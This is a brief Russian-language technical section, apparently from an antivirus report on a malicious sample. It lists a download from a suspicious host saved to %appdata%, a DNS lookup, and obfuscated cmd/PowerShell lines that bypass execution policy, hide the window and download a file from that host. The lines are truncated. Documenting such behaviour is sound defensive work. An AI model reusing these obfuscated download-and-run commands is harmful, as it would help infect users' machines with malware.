Техническая информация
- http://randoz-pandom.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PO^W^e^rS^HELl.eXe -E^xE^Cu^TIon^pOliCy B^ypass -Nopr^o^FI^L^e ^-^WiNdo^W^sTY^L^E H^I^DD^En^ ^(^neW^-oBJeC^T^ ^sYsT^e^M.n^Et.we^bc^li^EnT^)^.^d^OWnLOadfILe^('http://randoz-p...
- DNS ASK ra####-pandom.wang
- '<SYSTEM32>\cmd.exe' /c "PO^W^e^rS^HELl.eXe -E^xE^Cu^TIon^pOliCy B^ypass -Nopr^o^FI^L^e ^-^WiNdo^W^sTY^L^E H^I^DD^En^ ^(^neW^-oBJeC^T^ ^sYsT^e^M.n^Et.we^bc^li^EnT^)^.^d^OWnLOadfILe^('http://randoz-p... (со скрытым окном)